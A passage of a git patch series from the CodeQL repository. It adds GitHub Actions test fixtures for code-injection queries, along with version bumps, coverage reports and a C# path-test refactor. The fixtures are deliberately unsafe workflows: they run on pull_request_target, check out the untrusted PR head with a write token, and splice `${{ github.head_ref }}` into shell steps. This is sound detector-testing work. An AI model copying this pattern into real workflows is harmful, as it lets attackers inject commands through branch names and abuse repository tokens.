should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! 
-path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 
'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. 
Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml new file mode 100644 index 00000000000..8bffcdc4020 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml 
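Review bot: This fixture has no header saying it is deliberately vulnerable test data, and it is a full 251-line copy of a third-party action when only a few steps seem relevant to the queries: the `Checkout Repository` step and the `run:` scripts that interpolate `${{ ... }}` expressions, for example `git pull origin ${{ github.head_ref || github.ref }}`. A first-line comment such as `# Test fixture: intentionally unsafe, do not reuse` would stop it being copied as a working action. Trimming the file to the relevant steps would also make the locations in the `.expected` files easier to audit. The `action7/action.yml` fixture added next is the same file plus one comment line, so the same applies there.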
@@ -0,0 +1,252 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q 
git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name 
should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! 
-path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 
'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + # this action is not called in the test + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. 
Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml new file mode 100644 index 00000000000..dbc0137ed5b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml @@ -0,0 +1,34 @@ +# Ultralytics 🚀 - AGPL-3.0 License https://ultralytics.com/license +# Ultralytics Actions https://github.com/ultralytics/actions +# This workflow automatically formats code and documentation in PRs to official Ultralytics standards + +name: Ultralytics Actions + +on: + issues: + types: [opened, edited] + discussion: + types: [created] + pull_request_target: + branches: [main] + types: [opened, closed, synchronize, review_requested] + +permissions: + contents: write + +jobs: + format: + runs-on: ubuntu-latest + steps: + - name: Run Ultralytics Formatting + uses: ./.github/actions/action6 + with: + token: ${{ secrets._GITHUB_TOKEN }} # note GITHUB_TOKEN automatically generated + labels: true # autolabel issues and PRs + python: true # format Python code and docstrings + prettier: true # format YAML, JSON, Markdown and CSS + spelling: true # check spelling + links: false # check broken links + summary: true # print PR summary with GPT4o (requires 'openai_api_key') + openai_api_key: ${{ secrets.OPENAI_API_KEY }} + first_issue_response: "foo" 
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index deee6f5202b..b2afe0577aa 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -230,6 +230,8 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e13c2b80a72..605fa2924ff 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -230,6 +230,8 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$( Date: Mon, 9 Dec 2024 21:48:17 +0100 Subject: [PATCH 0961/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d938d0617e9..dd83f705219 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.2.1 +version: 0.2.2 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 99ac2c74011..90c64f0b746 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.2.1 +version: 0.2.2 groups: [actions, queries] suites: codeql-suites extractor: javascript From 8f5822e4c6b6618e029d02eb2ef94c356a175a35 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Tue, 10 Dec 2024 00:22:53 +0000 Subject: [PATCH 0962/1267] Add changed framework coverage reports --- csharp/documentation/library-coverage/coverage.csv | 1 + csharp/documentation/library-coverage/coverage.rst | 4 ++-- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/csharp/documentation/library-coverage/coverage.csv b/csharp/documentation/library-coverage/coverage.csv index 39646702a8c..50035b8a009 100644 --- a/csharp/documentation/library-coverage/coverage.csv +++ b/csharp/documentation/library-coverage/coverage.csv @@ -14,6 +14,7 @@ Microsoft.Android.Build,,1,14,,,,,,,,,,,,,1,,,,,,12,2 Microsoft.Apple.Build,,,7,,,,,,,,,,,,,,,,,,,7, Microsoft.ApplicationBlocks.Data,28,,,,,,,,,,,,28,,,,,,,,,, Microsoft.AspNetCore.Components,,2,1,,,,,,,,,,,,,,,,2,,,1, +Microsoft.AspNetCore.Mvc,,,2,,,,,,,,,,,,,,,,,,,,2 Microsoft.AspNetCore.WebUtilities,,,2,,,,,,,,,,,,,,,,,,,2, Microsoft.CSharp,,,2,,,,,,,,,,,,,,,,,,,2, Microsoft.Diagnostics.Tools.Pgo,,,25,,,,,,,,,,,,,,,,,,,2,23 diff --git a/csharp/documentation/library-coverage/coverage.rst b/csharp/documentation/library-coverage/coverage.rst index 7023de4a356..77354aa656d 100644 --- a/csharp/documentation/library-coverage/coverage.rst +++ b/csharp/documentation/library-coverage/coverage.rst 
@@ -9,6 +9,6 @@ C# framework & library support Framework / library,Package,Flow sources,Taint & value steps,Sinks (total),`CWE-079` :sub:`Cross-site scripting` `ServiceStack `_,"``ServiceStack.*``, ``ServiceStack``",,7,194, System,"``System.*``, ``System``",47,10819,54,5 - Others,"``Amazon.Lambda.APIGatewayEvents``, ``Amazon.Lambda.Core``, ``Dapper``, ``ILCompiler``, ``ILLink.RoslynAnalyzer``, ``ILLink.Shared``, ``ILLink.Tasks``, ``Internal.IL``, ``Internal.Pgo``, ``Internal.TypeSystem``, ``JsonToItemsTaskFactory``, ``Microsoft.Android.Build``, ``Microsoft.Apple.Build``, ``Microsoft.ApplicationBlocks.Data``, ``Microsoft.AspNetCore.Components``, ``Microsoft.AspNetCore.WebUtilities``, ``Microsoft.CSharp``, ``Microsoft.Diagnostics.Tools.Pgo``, ``Microsoft.DotNet.Build.Tasks``, ``Microsoft.DotNet.PlatformAbstractions``, ``Microsoft.EntityFrameworkCore``, ``Microsoft.Extensions.Caching.Distributed``, ``Microsoft.Extensions.Caching.Memory``, ``Microsoft.Extensions.Configuration``, ``Microsoft.Extensions.DependencyInjection``, ``Microsoft.Extensions.DependencyModel``, ``Microsoft.Extensions.Diagnostics.Metrics``, ``Microsoft.Extensions.FileProviders``, ``Microsoft.Extensions.FileSystemGlobbing``, ``Microsoft.Extensions.Hosting``, ``Microsoft.Extensions.Http``, ``Microsoft.Extensions.Logging``, ``Microsoft.Extensions.Options``, ``Microsoft.Extensions.Primitives``, ``Microsoft.Interop``, ``Microsoft.JSInterop``, ``Microsoft.NET.Build.Tasks``, ``Microsoft.NET.Sdk.WebAssembly``, ``Microsoft.NET.WebAssembly.Webcil``, ``Microsoft.VisualBasic``, ``Microsoft.WebAssembly.Build.Tasks``, ``Microsoft.Win32``, ``Mono.Linker``, ``MySql.Data.MySqlClient``, ``Newtonsoft.Json``, ``SourceGenerators``, ``Windows.Security.Cryptography.Core``",59,2071,150,2 - Totals,,106,12897,398,7 + Others,"``Amazon.Lambda.APIGatewayEvents``, ``Amazon.Lambda.Core``, ``Dapper``, ``ILCompiler``, ``ILLink.RoslynAnalyzer``, ``ILLink.Shared``, ``ILLink.Tasks``, ``Internal.IL``, ``Internal.Pgo``, 
``Internal.TypeSystem``, ``JsonToItemsTaskFactory``, ``Microsoft.Android.Build``, ``Microsoft.Apple.Build``, ``Microsoft.ApplicationBlocks.Data``, ``Microsoft.AspNetCore.Components``, ``Microsoft.AspNetCore.Mvc``, ``Microsoft.AspNetCore.WebUtilities``, ``Microsoft.CSharp``, ``Microsoft.Diagnostics.Tools.Pgo``, ``Microsoft.DotNet.Build.Tasks``, ``Microsoft.DotNet.PlatformAbstractions``, ``Microsoft.EntityFrameworkCore``, ``Microsoft.Extensions.Caching.Distributed``, ``Microsoft.Extensions.Caching.Memory``, ``Microsoft.Extensions.Configuration``, ``Microsoft.Extensions.DependencyInjection``, ``Microsoft.Extensions.DependencyModel``, ``Microsoft.Extensions.Diagnostics.Metrics``, ``Microsoft.Extensions.FileProviders``, ``Microsoft.Extensions.FileSystemGlobbing``, ``Microsoft.Extensions.Hosting``, ``Microsoft.Extensions.Http``, ``Microsoft.Extensions.Logging``, ``Microsoft.Extensions.Options``, ``Microsoft.Extensions.Primitives``, ``Microsoft.Interop``, ``Microsoft.JSInterop``, ``Microsoft.NET.Build.Tasks``, ``Microsoft.NET.Sdk.WebAssembly``, ``Microsoft.NET.WebAssembly.Webcil``, ``Microsoft.VisualBasic``, ``Microsoft.WebAssembly.Build.Tasks``, ``Microsoft.Win32``, ``Mono.Linker``, ``MySql.Data.MySqlClient``, ``Newtonsoft.Json``, ``SourceGenerators``, ``Windows.Security.Cryptography.Core``",59,2073,150,2 + Totals,,106,12899,398,7 From 4275813b87f5d1cba5d5f2694544579538a9a01c Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Dec 2024 16:31:11 +0100 Subject: [PATCH 0963/1267] C#: Make the path tests independent. --- .../extractor/Semmle.Util.Tests/LongPaths.cs | 200 ++++++++++-------- 1 file changed, 117 insertions(+), 83 deletions(-) diff --git a/csharp/extractor/Semmle.Util.Tests/LongPaths.cs b/csharp/extractor/Semmle.Util.Tests/LongPaths.cs index c1583e27503..90607bc8f02 100644 --- a/csharp/extractor/Semmle.Util.Tests/LongPaths.cs +++ b/csharp/extractor/Semmle.Util.Tests/LongPaths.cs 
@@ -1,5 +1,6 @@
 using Xunit;
 using System;
+using System.Collections.Generic;
 using System.IO;
 using System.Linq;
 using Semmle.Util;
@@ -10,39 +11,51 @@ namespace SemmleTests.Semmle.Util /// Ensure that the Extractor works with long paths. /// These should be handled by .NET Core. /// - public sealed class LongPaths : IDisposable + public sealed class LongPaths { private static readonly string tmpDir = Environment.GetEnvironmentVariable("TEST_TMPDIR") ?? Path.GetTempPath(); - private static readonly string shortPath = Path.Combine(tmpDir, "test.txt"); - private static readonly string longPath = Path.Combine(tmpDir, "aaaaaaaaaaaaaaaaaaaaaaaaaaaa", "bbbbbbbbbbbbbbbbbbbbbbbbbbbbb", + private static readonly string longPathDir = Path.Combine(tmpDir, "aaaaaaaaaaaaaaaaaaaaaaaaaaaa", "bbbbbbbbbbbbbbbbbbbbbbbbbbbbb", "ccccccccccccccccccccccccccccccc", "ddddddddddddddddddddddddddddddddddddd", "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeee", "fffffffffffffffffffffffffffffffff", - "ggggggggggggggggggggggggggggggggggg", "hhhhhhhhhhhhhhhhhhhhhhhhhhhhhh", "iiiiiiiiiiiiiiii.txt"); + "ggggggggggggggggggggggggggggggggggg", "hhhhhhhhhhhhhhhhhhhhhhhhhhhhhh"); + + private static string MakeLongPath() + { + var uniquePostfix = Guid.NewGuid().ToString("N"); + return Path.Combine(longPathDir, $"iiiiiiiiiiiiiiii{uniquePostfix}.txt"); + } + + private static string MakeShortPath() + { + var uniquePostfix = Guid.NewGuid().ToString("N"); + return Path.Combine(tmpDir, $"test{uniquePostfix}.txt"); + } public LongPaths() { - CleanUp(); + // Create directory to avoid directory not found exceptions when deleting files + Directory.CreateDirectory(longPathDir); } - public void Dispose() + private static void Cleanup(params IEnumerable paths) { - CleanUp(); + foreach (var path in paths) + { + File.Delete(path); + } } - private static void CleanUp() + private static void WithSetUpAndTearDown(Action test) { + var longPath = MakeLongPath(); + var shortPath = MakeShortPath(); + Cleanup(longPath, shortPath); try { - File.Delete(shortPath); + test(longPath, shortPath); } - catch (DirectoryNotFoundException) - { - } - try - { - File.Delete(longPath); 
- } - catch (DirectoryNotFoundException) + finally { + Cleanup(longPath, shortPath); } } 
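Review bot: `Cleanup` is called from the `finally` in `WithSetUpAndTearDown`, so any exception thrown by `File.Delete` there replaces the test's own failure, and the loop stops before the remaining path is removed. Deleting each path inside its own `try { File.Delete(path); } catch (IOException) { }` would keep the original assertion error visible and still attempt both deletions. The `Cleanup(longPath, shortPath);` call before the `try` looks redundant now that both names carry a fresh `Guid`. `longPathDir` is created in the constructor and never removed in this hunk, so the fixed directory tree stays behind in the shared temp directory.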
@@ -63,122 +76,143 @@ namespace SemmleTests.Semmle.Util [Fact] public void Delete() { - // OK Do not exist. - File.Delete(shortPath); - File.Delete(longPath); + WithSetUpAndTearDown((longPath, shortPath) => + { + // OK Do not exist. + File.Delete(shortPath); + File.Delete(longPath); + }); } [Fact] public void Move() { - File.WriteAllText(shortPath, "abc"); - Directory.CreateDirectory(Path.GetDirectoryName(longPath)!); - File.Delete(longPath); - File.Move(shortPath, longPath); - File.Move(longPath, shortPath); - Assert.Equal("abc", File.ReadAllText(shortPath)); + WithSetUpAndTearDown((longPath, shortPath) => + { + File.WriteAllText(shortPath, "abc"); + File.Delete(longPath); + File.Move(shortPath, longPath); + File.Move(longPath, shortPath); + Assert.Equal("abc", File.ReadAllText(shortPath)); + }); } [Fact] public void Replace() { - File.WriteAllText(shortPath, "abc"); - File.Delete(longPath); - Directory.CreateDirectory(Path.GetDirectoryName(longPath)!); - File.Move(shortPath, longPath); - File.WriteAllText(shortPath, "def"); - FileUtils.MoveOrReplace(shortPath, longPath); - File.WriteAllText(shortPath, "abc"); - FileUtils.MoveOrReplace(longPath, shortPath); - Assert.Equal("def", File.ReadAllText(shortPath)); + WithSetUpAndTearDown((longPath, shortPath) => + { + File.WriteAllText(shortPath, "abc"); + File.Move(shortPath, longPath); + File.WriteAllText(shortPath, "def"); + FileUtils.MoveOrReplace(shortPath, longPath); + File.WriteAllText(shortPath, "abc"); + FileUtils.MoveOrReplace(longPath, shortPath); + Assert.Equal("def", File.ReadAllText(shortPath)); + }); } - private readonly byte[] buffer1 = new byte[10] { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 }; + private readonly byte[] buffer1 = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 }; [Fact] public void CreateShortStream() { - var buffer2 = new byte[10]; - - using (var s1 = new FileStream(shortPath, FileMode.Create, FileAccess.Write, FileShare.None)) + WithSetUpAndTearDown((_, shortPath) => { - s1.Write(buffer1, 0, 10); - } + var buffer2 
= new byte[10]; - using (var s2 = new FileStream(shortPath, FileMode.Open, FileAccess.Read, FileShare.None)) - { - Assert.Equal(10, s2.Read(buffer2, 0, 10)); - Assert.True(Enumerable.SequenceEqual(buffer1, buffer2)); - } + using (var s1 = new FileStream(shortPath, FileMode.Create, FileAccess.Write, FileShare.None)) + { + s1.Write(buffer1, 0, 10); + } + + using (var s2 = new FileStream(shortPath, FileMode.Open, FileAccess.Read, FileShare.None)) + { + Assert.Equal(10, s2.Read(buffer2, 0, 10)); + Assert.True(Enumerable.SequenceEqual(buffer1, buffer2)); + } + }); } [Fact] public void CreateLongStream() { - var buffer2 = new byte[10]; - - Directory.CreateDirectory(Path.GetDirectoryName(longPath)!); - - using (var s3 = new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None)) + WithSetUpAndTearDown((longPath, _) => { - s3.Write(buffer1, 0, 10); - } + var buffer2 = new byte[10]; - using (var s4 = new FileStream(longPath, FileMode.Open, FileAccess.Read, FileShare.None)) - { - Assert.Equal(10, s4.Read(buffer2, 0, 10)); - Assert.True(Enumerable.SequenceEqual(buffer1, buffer2)); - } + Directory.CreateDirectory(Path.GetDirectoryName(longPath)!); + + using (var s3 = new FileStream(longPath, FileMode.Create, FileAccess.Write, FileShare.None)) + { + s3.Write(buffer1, 0, 10); + } + + using (var s4 = new FileStream(longPath, FileMode.Open, FileAccess.Read, FileShare.None)) + { + Assert.Equal(10, s4.Read(buffer2, 0, 10)); + Assert.True(Enumerable.SequenceEqual(buffer1, buffer2)); + } + }); } [Fact] public void FileDoesNotExist() { - // File does not exist - Assert.Throws(() => + WithSetUpAndTearDown((longPath, _) => { - using (new FileStream(longPath, FileMode.Open, FileAccess.Read, FileShare.None)) + // File does not exist + Assert.Throws(() => { - // - } + using (new FileStream(longPath, FileMode.Open, FileAccess.Read, FileShare.None)) + { + // + } + }); }); } [Fact] public void OverwriteFile() { - using (var s1 = new FileStream(longPath, FileMode.Create, 
